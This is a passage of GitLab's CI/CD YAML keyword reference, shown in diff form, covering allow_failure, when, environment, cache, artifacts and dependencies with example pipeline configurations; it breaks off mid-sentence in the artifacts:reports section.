+`windows`, you can run a job on each platform: + +```yaml +windows job: + stage: + - build + tags: + - windows + script: + - echo Hello, %USERNAME%! + +osx job: + stage: + - build + tags: + - osx + script: + - echo "Hello, $USER!" +``` + +### `allow_failure` + +Use `allow_failure` when you want to let a job fail without impacting the rest of the CI +suite. The default value is `false`, except for [manual](#whenmanual) jobs that use +the `when: manual` syntax. + +In jobs that use [`rules:`](#rules), all jobs default to `allow_failure: false`, +*including* `when: manual` jobs. + +When `allow_failure` is set to `true` and the job fails, the job shows an orange warning in the UI. +However, the logical flow of the pipeline considers the job a +success/passed, and is not blocked. + +Assuming all other jobs are successful, the job's stage and its pipeline +show the same orange warning. However, the associated commit is marked as +"passed", without warnings. + +In the following example, `job1` and `job2` run in parallel. If `job1` +fails, it doesn't stop the next stage from running, because it's marked with +`allow_failure: true`: + +```yaml +job1: + stage: test + script: + - execute_script_that_will_fail + allow_failure: true + +job2: + stage: test + script: + - execute_script_that_will_succeed + +job3: + stage: deploy + script: + - deploy_to_staging +``` + +#### `allow_failure:exit_codes` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/273157) in GitLab 13.8. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/292024) in GitLab 13.9. + +Use `allow_failure:exit_codes` to dynamically control if a job should be allowed +to fail. You can list which exit codes are not considered failures. The job fails +for any other exit code: + +```yaml +test_job_1: + script: + - echo "Run a script that results in exit code 1. This job fails." + - exit 1 + allow_failure: + exit_codes: 137 + +test_job_2: + script: + - echo "Run a script that results in exit code 137. This job is allowed to fail." + - exit 137 + allow_failure: + exit_codes: + - 137 + - 255 +``` + +### `when` + +Use `when` to implement jobs that run in case of failure or despite the +failure. + +The valid values of `when` are: + +1. `on_success` (default) - Execute job only when all jobs in earlier stages succeed, + or are considered successful because they have `allow_failure: true`. +1. `on_failure` - Execute job only when at least one job in an earlier stage fails. +1. `always` - Execute job regardless of the status of jobs in earlier stages. +1. `manual` - Execute job [manually](#whenmanual). +1. `delayed` - [Delay the execution of a job](#whendelayed) for a specified duration. + Added in GitLab 11.14. +1. `never`: + - With job [`rules`](#rules), don't execute job. + - With [`workflow:rules`](#workflow), don't run pipeline. + +In the following example, the script: + +1. Executes `cleanup_build_job` only when `build_job` fails. +1. Always executes `cleanup_job` as the last step in pipeline regardless of + success or failure. +1. Executes `deploy_job` when you run it manually in the GitLab UI. + +```yaml +stages: + - build + - cleanup_build + - test + - deploy + - cleanup + +build_job: + stage: build + script: + - make build + +cleanup_build_job: + stage: cleanup_build + script: + - cleanup build when failed + when: on_failure + +test_job: + stage: test + script: + - make test + +deploy_job: + stage: deploy + script: + - make deploy + when: manual + +cleanup_job: + stage: cleanup + script: + - cleanup after jobs + when: always +``` + +#### `when:manual` + +A manual job is a type of job that is not executed automatically and must be explicitly +started by a user. You might want to use manual jobs for things like deploying to production. + +To make a job manual, add `when: manual` to its configuration. + +When the pipeline starts, manual jobs display as skipped and do not run automatically. +They can be started from the pipeline, job, [environment](../environments/index.md#configure-manual-deployments), +and deployment views. + +Manual jobs can be either optional or blocking: + +- **Optional**: Manual jobs have [`allow_failure: true](#allow_failure) set by default + and are considered optional. The status of an optional manual job does not contribute + to the overall pipeline status. A pipeline can succeed even if all its manual jobs fail. + +- **Blocking**: To make a blocking manual job, add `allow_failure: false` to its configuration. + Blocking manual jobs stop further execution of the pipeline at the stage where the + job is defined. To let the pipeline continue running, click **{play}** (play) on + the blocking manual job. + + Merge requests in projects with [merge when pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md) + enabled can't be merged with a blocked pipeline. Blocked pipelines show a status + of **blocked**. + +When you use [`rules:`](#rules), `allow_failure` defaults to `false`, including for manual jobs. + +To trigger a manual job, a user must have permission to merge to the assigned branch. +You can use [protected branches](../../user/project/protected_branches.md) to more strictly +[protect manual deployments](#protecting-manual-jobs) from being run by unauthorized users. + +In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/201938) and later, you +can use `when:manual` in the same job as [`trigger`](#trigger). In GitLab 13.4 and +earlier, using them together causes the error `jobs:#{job-name} when should be on_success, on_failure or always`. + +##### Protecting manual jobs **(PREMIUM)** + +Use [protected environments](../environments/protected_environments.md) +to define a list of users authorized to run a manual job. You can authorize only +the users associated with a protected environment to trigger manual jobs, which can: + +- More precisely limit who can deploy to an environment. +- Block a pipeline until an approved user "approves" it. + +To protect a manual job: + +1. Add an `environment` to the job. For example: + + ```yaml + deploy_prod: + stage: deploy + script: + - echo "Deploy to production server" + environment: + name: production + url: https://example.com + when: manual + rules: + - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH + ``` + +1. In the [protected environments settings](../environments/protected_environments.md#protecting-environments), + select the environment (`production` in this example) and add the users, roles or groups + that are authorized to trigger the manual job to the **Allowed to Deploy** list. Only those in + this list can trigger this manual job, as well as GitLab administrators + who are always able to use protected environments. + +You can use protected environments with blocking manual jobs to have a list of users +allowed to approve later pipeline stages. Add `allow_failure: false` to the protected +manual job and the pipeline's next stages only run after the manual job is triggered +by authorized users. + +#### `when:delayed` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/51352) in GitLab 11.4. + +Use `when: delayed` to execute scripts after a waiting period, or if you want to avoid +jobs immediately entering the `pending` state. + +You can set the period with `start_in` keyword. The value of `start_in` is an elapsed time in seconds, unless a unit is +provided. `start_in` must be less than or equal to one week. Examples of valid values include: + +- `'5'` +- `5 seconds` +- `30 minutes` +- `1 day` +- `1 week` + +When a stage includes a delayed job, the pipeline doesn't progress until the delayed job finishes. +You can use this keyword to insert delays between different stages. + +The timer of a delayed job starts immediately after the previous stage completes. +Similar to other types of jobs, a delayed job's timer doesn't start unless the previous stage passes. + +The following example creates a job named `timed rollout 10%` that is executed 30 minutes after the previous stage completes: + +```yaml +timed rollout 10%: + stage: deploy + script: echo 'Rolling out 10% ...' + when: delayed + start_in: 30 minutes +``` + +To stop the active timer of a delayed job, click the **{time-out}** (**Unschedule**) button. +This job can no longer be scheduled to run automatically. You can, however, execute the job manually. + +To start a delayed job immediately, click the **Play** button. +Soon GitLab Runner picks up and starts the job. + +### `environment` + +Use `environment` to define the [environment](../environments/index.md) that a job deploys to. +For example: + +```yaml +deploy to production: + stage: deploy + script: git push production HEAD:main + environment: production +``` + +You can assign a value to the `environment` keyword by using: + +- Plain text, like `production`. +- Variables, including CI/CD variables, predefined, secure, or variables + defined in the `.gitlab-ci.yml` file. + +You can't use variables defined in a `script` section. + +If you specify an `environment` and no environment with that name exists, +an environment is created. + +#### `environment:name` + +Set a name for an [environment](../environments/index.md). For example: + +```yaml +deploy to production: + stage: deploy + script: git push production HEAD:main + environment: + name: production +``` + +Common environment names are `qa`, `staging`, and `production`, but you can use any +name you want. + +You can assign a value to the `name` keyword by using: + +- Plain text, like `staging`. +- Variables, including CI/CD variables, predefined, secure, or variables + defined in the `.gitlab-ci.yml` file. + +You can't use variables defined in a `script` section. + +The environment `name` can contain: + +- Letters +- Digits +- Spaces +- `-` +- `_` +- `/` +- `$` +- `{` +- `}` + +#### `environment:url` + +Set a URL for an [environment](../environments/index.md). For example: + +```yaml +deploy to production: + stage: deploy + script: git push production HEAD:main + environment: + name: production + url: https://prod.example.com +``` + +After the job completes, you can access the URL by using a button in the merge request, +environment, or deployment pages. + +You can assign a value to the `url` keyword by using: + +- Plain text, like `https://prod.example.com`. +- Variables, including CI/CD variables, predefined, secure, or variables + defined in the `.gitlab-ci.yml` file. + +You can't use variables defined in a `script` section. + +#### `environment:on_stop` + +Closing (stopping) environments can be achieved with the `on_stop` keyword +defined under `environment`. It declares a different job that runs to close the +environment. + +Read the `environment:action` section for an example. + +#### `environment:action` + +Use the `action` keyword to specify jobs that prepare, start, or stop environments. + +| **Value** | **Description** | +|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `start` | Default value. Indicates that job starts the environment. The deployment is created after the job starts. | +| `prepare` | Indicates that the job is only preparing the environment. It does not trigger deployments. [Read more about preparing environments](../environments/index.md#prepare-an-environment-without-creating-a-deployment). | +| `stop` | Indicates that job stops deployment. See the example below. | + +Take for instance: + +```yaml +review_app: + stage: deploy + script: make deploy-app + environment: + name: review/$CI_COMMIT_REF_NAME + url: https://$CI_ENVIRONMENT_SLUG.example.com + on_stop: stop_review_app + +stop_review_app: + stage: deploy + variables: + GIT_STRATEGY: none + script: make delete-app + when: manual + environment: + name: review/$CI_COMMIT_REF_NAME + action: stop +``` + +In the above example, the `review_app` job deploys to the `review` +environment. A new `stop_review_app` job is listed under `on_stop`. +After the `review_app` job is finished, it triggers the +`stop_review_app` job based on what is defined under `when`. In this case, +it is set to `manual`, so it needs a [manual action](#whenmanual) from +the GitLab UI to run. + +Also in the example, `GIT_STRATEGY` is set to `none`. If the +`stop_review_app` job is [automatically triggered](../environments/index.md#stopping-an-environment), +the runner won't try to check out the code after the branch is deleted. + +The example also overwrites global variables. If your `stop` `environment` job depends +on global variables, use [anchor variables](#yaml-anchors-for-variables) when you set the `GIT_STRATEGY` +to change the job without overriding the global variables. + +The `stop_review_app` job is **required** to have the following keywords defined: + +- `when`, defined at either: + - [The job level](#when). + - [In a rules clause](#rules). If you use `rules:` and `when: manual`, you should + also set [`allow_failure: true`](#allow_failure) so the pipeline can complete + even if the job doesn't run. +- `environment:name` +- `environment:action` + +Additionally, both jobs should have matching [`rules`](#only--except) +or [`only/except`](#only--except) configuration. + +In the examples above, if the configuration is not identical: + +- The `stop_review_app` job might not be included in all pipelines that include the `review_app` job. +- It is not possible to trigger the `action: stop` to stop the environment automatically. + +#### `environment:auto_stop_in` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/20956) in GitLab 12.8. + +The `auto_stop_in` keyword is for specifying the lifetime of the environment, +that when expired, GitLab automatically stops them. + +For example, + +```yaml +review_app: + script: deploy-review-app + environment: + name: review/$CI_COMMIT_REF_NAME + auto_stop_in: 1 day +``` + +When the environment for `review_app` is created, the environment's lifetime is set to `1 day`. +Every time the review app is deployed, that lifetime is also reset to `1 day`. + +For more information, see +[the environments auto-stop documentation](../environments/index.md#stop-an-environment-after-a-certain-time-period) + +#### `environment:kubernetes` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27630) in GitLab 12.6. + +Use the `kubernetes` keyword to configure deployments to a +[Kubernetes cluster](../../user/project/clusters/index.md) that is associated with your project. + +For example: + +```yaml +deploy: + stage: deploy + script: make deploy-app + environment: + name: production + kubernetes: + namespace: production +``` + +This configuration sets up the `deploy` job to deploy to the `production` +environment, using the `production` +[Kubernetes namespace](https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/). + +For more information, see +[Available settings for `kubernetes`](../environments/index.md#configure-kubernetes-deployments). + +NOTE: +Kubernetes configuration is not supported for Kubernetes clusters +that are [managed by GitLab](../../user/project/clusters/index.md#gitlab-managed-clusters). +To follow progress on support for GitLab-managed clusters, see the +[relevant issue](https://gitlab.com/gitlab-org/gitlab/-/issues/38054). + +#### `environment:deployment_tier` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/300741) in GitLab 13.10. + +Use the `deployment_tier` keyword to specify the tier of the deployment environment: + +```yaml +deploy: + script: echo + environment: + name: customer-portal + deployment_tier: production +``` + +For more information, +see [Deployment tier of environments](../environments/index.md#deployment-tier-of-environments). + +#### Dynamic environments + +Use CI/CD [variables](../variables/index.md) to dynamically name environments. + +For example: + +```yaml +deploy as review app: + stage: deploy + script: make deploy + environment: + name: review/$CI_COMMIT_REF_NAME + url: https://$CI_ENVIRONMENT_SLUG.example.com/ +``` + +The `deploy as review app` job is marked as a deployment to dynamically +create the `review/$CI_COMMIT_REF_NAME` environment. `$CI_COMMIT_REF_NAME` +is a [CI/CD variable](../variables/index.md) set by the runner. The +`$CI_ENVIRONMENT_SLUG` variable is based on the environment name, but suitable +for inclusion in URLs. If the `deploy as review app` job runs in a branch named +`pow`, this environment would be accessible with a URL like `https://review-pow.example.com/`. + +The common use case is to create dynamic environments for branches and use them +as Review Apps. You can see an example that uses Review Apps at +<https://gitlab.com/gitlab-examples/review-apps-nginx/>. + +### `cache` + +Use `cache` to specify a list of files and directories to +cache between jobs. You can only use paths that are in the local working copy. + +Caching is shared between pipelines and jobs. Caches are restored before [artifacts](#artifacts). + +Learn more about caches in [Caching in GitLab CI/CD](../caching/index.md). + +#### `cache:paths` + +Use the `cache:paths` keyword to choose which files or directories to cache. + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: An array of paths relative to the project directory (`$CI_PROJECT_DIR`). +You can use wildcards that use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) +patterns: + +- In [GitLab Runner 13.0](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2620) and later, +[`doublestar.Glob`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#Match). +- In GitLab Runner 12.10 and earlier, +[`filepath.Match`](https://pkg.go.dev/path/filepath#Match). + +**Example of `cache:paths`**: + +Cache all files in `binaries` that end in `.apk` and the `.config` file: + +```yaml +rspec: + script: + - echo "This job uses a cache." + cache: + key: binaries-cache + paths: + - binaries/*.apk + - .config +``` + +**Related topics**: + +- See the [common `cache` use cases](../caching/index.md#common-use-cases-for-caches) for more + `cache:paths` examples. + +#### `cache:key` + +Use the `cache:key` keyword to give each cache a unique identifying key. All jobs +that use the same cache key use the same cache, including in different pipelines. + +If not set, the default key is `default`. All jobs with the `cache:` keyword but +no `cache:key` share the `default` cache. + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: + +- A string. +- A [predefined variables](../variables/index.md). +- A combination of both. + +**Example of `cache:key`**: + +```yaml +cache-job: + script: + - echo "This job uses a cache." + cache: + key: binaries-cache-$CI_COMMIT_REF_SLUG + paths: + - binaries/ +``` + +**Additional details**: + +- If you use **Windows Batch** to run your shell scripts you need to replace + `$` with `%`. For example: `key: %CI_COMMIT_REF_SLUG%` +- The `cache:key` value can't contain: + + - The `/` character, or the equivalent URI-encoded `%2F`. + - Only the `.` character (any number), or the equivalent URI-encoded `%2E`. + +- The cache is shared between jobs, so if you're using different + paths for different jobs, you should also set a different `cache:key`. + Otherwise cache content can be overwritten. + +**Related topics**: + +- You can specify a [fallback cache key](../caching/index.md#use-a-fallback-cache-key) + to use if the specified `cache:key` is not found. +- You can [use multiple cache keys](../caching/index.md#use-multiple-caches) in a single job. +- See the [common `cache` use cases](../caching/index.md#common-use-cases-for-caches) for more + `cache:key` examples. + +##### `cache:key:files` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/18986) in GitLab v12.5. + +Use the `cache:key:files` keyword to generate a new key when one or two specific files +change. `cache:key:files` lets you reuse some caches, and rebuild them less often, +which speeds up subsequent pipeline runs. + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: An array of one or two file paths. + +**Example of `cache:key:files`**: + +```yaml +cache-job: + script: + - echo "This job uses a cache." + cache: + key: + files: + - Gemfile.lock + - package.json + paths: + - vendor/ruby + - node_modules +``` + +This example creates a cache for Ruby and Node.js dependencies. The cache +is tied to the current versions of the `Gemfile.lock` and `package.json` files. When one of +these files changes, a new cache key is computed and a new cache is created. Any future +job runs that use the same `Gemfile.lock` and `package.json` with `cache:key:files` +use the new cache, instead of rebuilding the dependencies. + +**Additional details**: The cache `key` is a SHA computed from the most recent commits +that changed each listed file. If neither file is changed in any commits, the +fallback key is `default`. + +##### `cache:key:prefix` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/18986) in GitLab v12.5. + +Use `cache:key:prefix` to combine a prefix with the SHA computed for [`cache:key:files`](#cachekeyfiles). + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: + +- A string +- A [predefined variables](../variables/index.md) +- A combination of both. + +**Example of `cache:key:prefix`**: + +```yaml +rspec: + script: + - echo "This rspec job uses a cache." + cache: + key: + files: + - Gemfile.lock + prefix: $CI_JOB_NAME + paths: + - vendor/ruby +``` + +For example, adding a `prefix` of `$CI_JOB_NAME` causes the key to look like `rspec-feef9576d21ee9b6a32e30c5c79d0a0ceb68d1e5`. +If a branch changes `Gemfile.lock`, that branch has a new SHA checksum for `cache:key:files`. +A new cache key is generated, and a new cache is created for that key. If `Gemfile.lock` +is not found, the prefix is added to `default`, so the key in the example would be `rspec-default`. + +**Additional details**: If no file in `cache:key:files` is changed in any commits, +the prefix is added to the `default` key. + +#### `cache:untracked` + +Use `untracked: true` to cache all files that are untracked in your Git repository: + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: `true` or `false` (default). + +**Example of `cache:untracked`**: + +```yaml +rspec: + script: test + cache: + untracked: true +``` + +**Additional details**: + +- You can combine `cache:untracked` with `cache:paths` to cache all untracked files + as well as files in the configured paths. For example: + + ```yaml + rspec: + script: test + cache: + untracked: true + paths: + - binaries/ + ``` + +#### `cache:when` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/18969) in GitLab 13.5 and GitLab Runner v13.5.0. + +Use `cache:when` to define when to save the cache, based on the status of the job. + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: + +- `on_success` (default): Save the cache only when the job succeeds. +- `on_failure`: Save the cache only when the job fails. +- `always`: Always save the cache. + +**Example of `cache:when`**: + +```yaml +rspec: + script: rspec + cache: + paths: + - rspec/ + when: 'always' +``` + +This example stores the cache whether or not the job fails or succeeds. + +#### `cache:policy` + +To change the upload and download behavior of a cache, use the `cache:policy` keyword. +By default, the job downloads the cache when the job starts, and uploads changes +to the cache when the job ends. This is the `pull-push` policy (default). + +To set a job to only download the cache when the job starts, but never upload changes +when the job finishes, use `cache:policy:pull`. + +To set a job to only upload a cache when the job finishes, but never download the +cache when the job starts, use `cache:policy:push`. + +Use the `pull` policy when you have many jobs executing in parallel that use the same cache. +This policy speeds up job execution and reduces load on the cache server. You can +use a job with the `push` policy to build the cache. + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: + +- `pull` +- `push` +- `pull-push` (default) + +**Example of `cache:policy`**: + +```yaml +prepare-dependencies-job: + stage: build + cache: + key: gems + paths: + - vendor/bundle + policy: push + script: + - echo "This job only downloads dependencies and builds the cache." + - echo "Downloading dependencies..." + +faster-test-job: + stage: test + cache: + key: gems + paths: + - vendor/bundle + policy: pull + script: + - echo "This job script uses the cache, but does not update it." + - echo "Running tests..." +``` + +### `artifacts` + +Use `artifacts` to specify a list of files and directories that are +attached to the job when it [succeeds, fails, or always](#artifactswhen). + +The artifacts are sent to GitLab after the job finishes. They are +available for download in the GitLab UI if the size is not +larger than the [maximum artifact size](../../user/gitlab_com/index.md#gitlab-cicd). + +By default, jobs in later stages automatically download all the artifacts created +by jobs in earlier stages. You can control artifact download behavior in jobs with +[`dependencies`](#dependencies). + +When using the [`needs`](#artifact-downloads-with-needs) keyword, jobs can only download +artifacts from the jobs defined in the `needs` configuration. + +Job artifacts are only collected for successful jobs by default, and +artifacts are restored after [caches](#cache). + +[Read more about artifacts](../pipelines/job_artifacts.md). + +#### `dependencies` + +By default, all `artifacts` from previous stages +are passed to each job. However, you can use the `dependencies` keyword to +define a limited list of jobs to fetch artifacts from. You can also set a job to download no artifacts at all. + +To use this feature, define `dependencies` in context of the job and pass +a list of all previous jobs the artifacts should be downloaded from. + +You can define jobs from stages that were executed before the current one. +An error occurs if you define jobs from the current or an upcoming stage. + +To prevent a job from downloading artifacts, define an empty array. + +When you use `dependencies`, the status of the previous job is not considered. +If a job fails or it's a manual job that isn't triggered, no error occurs. + +The following example defines two jobs with artifacts: `build:osx` and +`build:linux`. When the `test:osx` is executed, the artifacts from `build:osx` +are downloaded and extracted in the context of the build. The same happens +for `test:linux` and artifacts from `build:linux`. + +The job `deploy` downloads artifacts from all previous jobs because of +the [stage](#stages) precedence: + +```yaml +build:osx: + stage: build + script: make build:osx + artifacts: + paths: + - binaries/ + +build:linux: + stage: build + script: make build:linux + artifacts: + paths: + - binaries/ + +test:osx: + stage: test + script: make test:osx + dependencies: + - build:osx + +test:linux: + stage: test + script: make test:linux + dependencies: + - build:linux + +deploy: + stage: deploy + script: make deploy +``` + +##### When a dependent job fails + +> Introduced in GitLab 10.3. + +If the artifacts of the job that is set as a dependency are +[expired](#artifactsexpire_in) or +[deleted](../pipelines/job_artifacts.md#delete-job-artifacts), then +the dependent job fails. + +#### `artifacts:exclude` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15122) in GitLab 13.1 +> - Requires GitLab Runner 13.1 + +`exclude` makes it possible to prevent files from being added to an artifacts +archive. + +Similar to [`artifacts:paths`](#artifactspaths), `exclude` paths are relative +to the project directory. You can use Wildcards that use +[glob](https://en.wikipedia.org/wiki/Glob_(programming)) or +[`doublestar.PathMatch`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#PathMatch) patterns. + +For example, to store all files in `binaries/`, but not `*.o` files located in +subdirectories of `binaries/`: + +```yaml +artifacts: + paths: + - binaries/ + exclude: + - binaries/**/*.o +``` + +Unlike [`artifacts:paths`](#artifactspaths), `exclude` paths are not recursive. To exclude all of the contents of a directory, you can match them explicitly rather than matching the directory itself. + +For example, to store all files in `binaries/` but nothing located in the `temp/` subdirectory: + +```yaml +artifacts: + paths: + - binaries/ + exclude: + - binaries/temp/**/* +``` + +Files matched by [`artifacts:untracked`](#artifactsuntracked) can be excluded using +`artifacts:exclude` too. + +#### `artifacts:expire_in` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16267) in GitLab 13.0 behind a disabled feature flag, the latest job artifacts are kept regardless of expiry time. +> - [Made default behavior](https://gitlab.com/gitlab-org/gitlab/-/issues/229936) in GitLab 13.4. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/241026) in GitLab 13.8, keeping latest job artifacts can be disabled at the project level. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/276583) in GitLab 13.9, keeping latest job artifacts can be disabled instance-wide. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/321323) in GitLab 13.12, the latest pipeline artifacts are kept regardless of expiry time. + +Use `expire_in` to specify how long [job artifacts](../pipelines/job_artifacts.md) are stored before +they expire and are deleted. The `expire_in` setting does not affect: + +- Artifacts from the latest job, unless this keeping the latest job artifacts is: + - [Disabled at the project level](../pipelines/job_artifacts.md#keep-artifacts-from-most-recent-successful-jobs). + - [Disabled instance-wide](../../user/admin_area/settings/continuous_integration.md#keep-the-latest-artifacts-for-all-jobs-in-the-latest-successful-pipelines). +- [Pipeline artifacts](../pipelines/pipeline_artifacts.md). It's not possible to specify an + expiration date for these: + - Pipeline artifacts from the latest pipeline are kept forever. + - Other pipeline artifacts are erased after one week. + +The value of `expire_in` is an elapsed time in seconds, unless a unit is provided. Valid values +include: + +- `'42'` +- `42 seconds` +- `3 mins 4 sec` +- `2 hrs 20 min` +- `2h20min` +- `6 mos 1 day` +- `47 yrs 6 mos and 4d` +- `3 weeks and 2 days` +- `never` + +To expire artifacts one week after being uploaded: + +```yaml +job: + artifacts: + expire_in: 1 week +``` + +The expiration time period begins when the artifact is uploaded and stored on GitLab. If the expiry +time is not defined, it defaults to the +[instance wide setting](../../user/admin_area/settings/continuous_integration.md#default-artifacts-expiration) +(30 days by default). + +To override the expiration date and protect artifacts from being automatically deleted: + +- Use the **Keep** button on the job page. +- [In GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/22761), set the value of + `expire_in` to `never`. + +After their expiry, artifacts are deleted hourly by default (using a cron job), and are not +accessible anymore. + +#### `artifacts:expose_as` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15018) in GitLab 12.5. + +Use the `expose_as` keyword to expose [job artifacts](../pipelines/job_artifacts.md) +in the [merge request](../../user/project/merge_requests/index.md) UI. + +For example, to match a single file: + +```yaml +test: + script: ["echo 'test' > file.txt"] + artifacts: + expose_as: 'artifact 1' + paths: ['file.txt'] +``` + +With this configuration, GitLab adds a link **artifact 1** to the relevant merge request +that points to `file1.txt`. To access the link, select **View exposed artifact** +below the pipeline graph in the merge request overview. + +An example that matches an entire directory: + +```yaml +test: + script: ["mkdir test && echo 'test' > test/file.txt"] + artifacts: + expose_as: 'artifact 1' + paths: ['test/'] +``` + +Note the following: + +- Artifacts do not display in the merge request UI when using variables to define the `artifacts:paths`. +- A maximum of 10 job artifacts per merge request can be exposed. +- Glob patterns are unsupported. +- If a directory is specified, the link is to the job [artifacts browser](../pipelines/job_artifacts.md#download-job-artifacts) if there is more than + one file in the directory. +- For exposed single file artifacts with `.html`, `.htm`, `.txt`, `.json`, `.xml`, + and `.log` extensions, if [GitLab Pages](../../administration/pages/index.md) is: + - Enabled, GitLab automatically renders the artifact. + - Not enabled, the file is displayed in the artifacts browser. + +#### `artifacts:name` + +Use the `name` directive to define the name of the created artifacts +archive. You can specify a unique name for every archive. The `artifacts:name` +variable can make use of any of the [predefined variables](../variables/index.md). +The default name is `artifacts`, which becomes `artifacts.zip` when you download it. + +To create an archive with a name of the current job: + +```yaml +job: + artifacts: + name: "$CI_JOB_NAME" + paths: + - binaries/ +``` + +To create an archive with a name of the current branch or tag including only +the binaries directory: + +```yaml +job: + artifacts: + name: "$CI_COMMIT_REF_NAME" + paths: + - binaries/ +``` + +If your branch-name contains forward slashes +(for example `feature/my-feature`) it's advised to use `$CI_COMMIT_REF_SLUG` +instead of `$CI_COMMIT_REF_NAME` for proper naming of the artifact. + +To create an archive with a name of the current job and the current branch or +tag including only the binaries directory: + +```yaml +job: + artifacts: + name: "$CI_JOB_NAME-$CI_COMMIT_REF_NAME" + paths: + - binaries/ +``` + +To create an archive with a name of the current [stage](#stages) and branch name: + +```yaml +job: + artifacts: + name: "$CI_JOB_STAGE-$CI_COMMIT_REF_NAME" + paths: + - binaries/ +``` + +--- + +If you use **Windows Batch** to run your shell scripts you need to replace +`$` with `%`: + +```yaml +job: + artifacts: + name: "%CI_JOB_STAGE%-%CI_COMMIT_REF_NAME%" + paths: + - binaries/ +``` + +If you use **Windows PowerShell** to run your shell scripts you need to replace +`$` with `$env:`: + +```yaml +job: + artifacts: + name: "$env:CI_JOB_STAGE-$env:CI_COMMIT_REF_NAME" + paths: + - binaries/ +``` + +#### `artifacts:paths` + +Paths are relative to the project directory (`$CI_PROJECT_DIR`) and can't directly +link outside it. You can use Wildcards that use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) +patterns and: + +- In [GitLab Runner 13.0](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2620) and later, +[`doublestar.Glob`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#Match). +- In GitLab Runner 12.10 and earlier, +[`filepath.Match`](https://pkg.go.dev/path/filepath#Match). + +To restrict which jobs a specific job fetches artifacts from, see [dependencies](#dependencies). + +Send all files in `binaries` and `.config`: + +```yaml +artifacts: + paths: + - binaries/ + - .config +``` + +To disable artifact passing, define the job with empty [dependencies](#dependencies): + +```yaml +job: + stage: build + script: make build + dependencies: [] +``` + +You may want to create artifacts only for tagged releases to avoid filling the +build server storage with temporary build artifacts. + +Create artifacts only for tags (`default-job` doesn't create artifacts): + +```yaml +default-job: + script: + - mvn test -U + rules: + - if: $CI_COMMIT_BRANCH + +release-job: + script: + - mvn package -U + artifacts: + paths: + - target/*.war + rules: + - if: $CI_COMMIT_TAG +``` + +You can use wildcards for directories too. For example, if you want to get all the files inside the directories that end with `xyz`: + +```yaml +job: + artifacts: + paths: + - path/*xyz/* +``` + +#### `artifacts:public` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/49775) in GitLab 13.8 +> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - It's disabled on GitLab.com. +> - It's recommended for production use. + +Use `artifacts:public` to determine whether the job artifacts should be +publicly available. + +The default for `artifacts:public` is `true` which means that the artifacts in +public pipelines are available for download by anonymous and guest users: + +```yaml +artifacts: + public: true +``` + +To deny read access for anonymous and guest users to artifacts in public +pipelines, set `artifacts:public` to `false`: + +```yaml +artifacts: + public: false +``` + +#### `artifacts:reports` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. +> - Requires GitLab Runner 11.2 and above. + +Use [`artifacts:reports`](#artifactsreports) +to collect test reports, code quality reports, and security reports from jobs. +It also exposes these reports in the GitLab UI (merge requests, pipeline views, and security dashboards). + +The test reports are collected regardless of the job results (success or failure). +You can use [`artifacts:expire_in`](#artifactsexpire_in) to set up an expiration +date for their artifacts. + +If you also want the ability to browse the report output files, include the +[`artifacts:paths`](#artifactspaths) keyword. + +##### `artifacts:reports:api_fuzzing` **(ULTIMATE)** + +> - Introduced in GitLab 13.4. +> - Requires GitLab Runner 13.4 or later. + +The `api_fuzzing` report collects [API Fuzzing bugs](../../user/application_security/api_fuzzing/index.md) +as artifacts. + +The collected API Fuzzing report uploads to GitLab as an artifact and is summarized in merge +requests and the pipeline view. It's also used to provide data for security dashboards. + +##### `artifacts:reports:cobertura` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/3708) in GitLab 12.9. +> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. + +The `cobertura` report collects [Cobertura coverage XML files](../../user/project/merge_requests/test_coverage_visualization.md). +The collected Cobertura coverage reports upload to GitLab as an artifact +and display in merge requests. + +Cobertura was originally developed for Java, but there are many +third party ports for other languages like JavaScript, Python, Ruby, and so on. + +##### `artifacts:reports:codequality` + +> - Introduced in GitLab 11.5. +> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/212499) to GitLab Free in 13.2. +> - Requires GitLab Runner 11.5 and above. + +The `codequality` report collects [Code 